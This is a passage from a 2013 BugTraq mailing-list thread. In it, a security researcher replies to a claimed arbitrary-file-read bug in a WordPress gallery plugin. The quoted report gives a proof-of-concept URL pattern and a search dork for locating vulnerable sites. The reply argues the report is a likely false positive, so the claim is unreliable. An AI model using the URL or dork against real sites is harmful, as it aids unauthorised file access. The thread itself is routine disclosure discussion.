BugTraq
Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability Jan 10 2013 01:01PM
Beni_vanda yahoo com (1 replies)
Re: Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability Jan 11 2013 09:06AM
Henri Salo (henri nerv fi) (1 replies)
On Thu, Jan 10, 2013 at 01:01:18PM +0000, Beni_vanda (at) yahoo (dot) com [email concealed] wrote:
> a bug in Wordpress gallery-3.8.3 plugin that allows to us to occur a
> Arbitrary File Read on a Local machin
>
>
>
> ########################################################################
########​##############
> #
> # Exploit Title : Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability
> #
> # Author : IrIsT.Ir
> #
> # Discovered By : Beni_Vanda
> #
> # Home : http://IrIsT.Ir/forum/
> #
> # Software Link : http://wordpress.org/extend/plugins/gallery-plugin/
> #
> # Security Risk : High
> #
> # Version : All Version
> #
> # Tested on : GNU/Linux Ubuntu - Windows Server - win7
> #
> # Dork : inurl:plugins/nextgen-gallery
> #
> ########################################################################
########​##############
> #
> # Expl0iTs :
> #
> # [Target]/wp-content/plugins/gallery-plugin/gallery-plugin.php?filename_1
=[AFR]
> #
> #
> ########################################################################
########​##############
> #
> # Greats : Amir - B3HZ4D - C0dex - TaK.FaNaR - Dead.Zone - nimaarek - m3hdi - F@rid - dr.tofan
> #
> # and All Members In Www.IrIsT.Ir/forum
> #
> ########################################################################
########​##############

Seems to be false positive. At least I can't make that PoC URL work. This goes to Apache's error.log after trying to reproduce with the newest version of this plugin:

mod_fcgid: stderr: PHP Fatal error: Call to undefined function register_activation_hook() in <snip>/wp-content/plugins/gallery-plugin/gallery-plugin.php on line 1334

Does the plugin need some kind of configuration before this vulnerability "activates"? Does "arbitrary file read vulnerability" mean it is not the same as remote file inclusion?

- Henri Salo

[ reply ]
Re: Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability Jan 16 2013 09:41AM
Paolo Perego (thesp0nge gmail com)


 

Privacy Statement
Copyright 2010, SecurityFocus